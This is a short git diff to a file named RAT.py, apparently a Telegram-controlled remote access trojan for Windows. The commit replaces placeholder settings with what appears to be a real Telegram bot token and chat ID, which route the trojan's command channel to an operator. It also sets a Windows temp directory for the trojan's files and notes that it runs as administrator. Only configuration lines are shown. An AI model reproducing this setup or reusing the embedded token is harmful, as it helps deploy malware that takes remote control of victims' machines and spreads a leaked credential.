diff --git a/RAT.py b/RAT.py index d55d0b7..a241372 100644 --- a/RAT.py +++ b/RAT.py @@ -2,8 +2,8 @@ # Token/ID -TelegramToken = 'TOKEN' -TelegramChatID = 'ID' +TelegramToken = '7004106798:AAGTUi-nzmTAzRtxrVDI978kkn6WoOYhiNo' +TelegramChatID = '7487861054' # Run the script as administrator @@ -35,4 +35,4 @@ # Directory for saving trojan temporary files -Directory = 'C:\\Windows\\Temp\\TelegramRAT\\' \ No newline at end of file +Directory = 'C:\\Windows\\Temp\\TelegramRAT\\'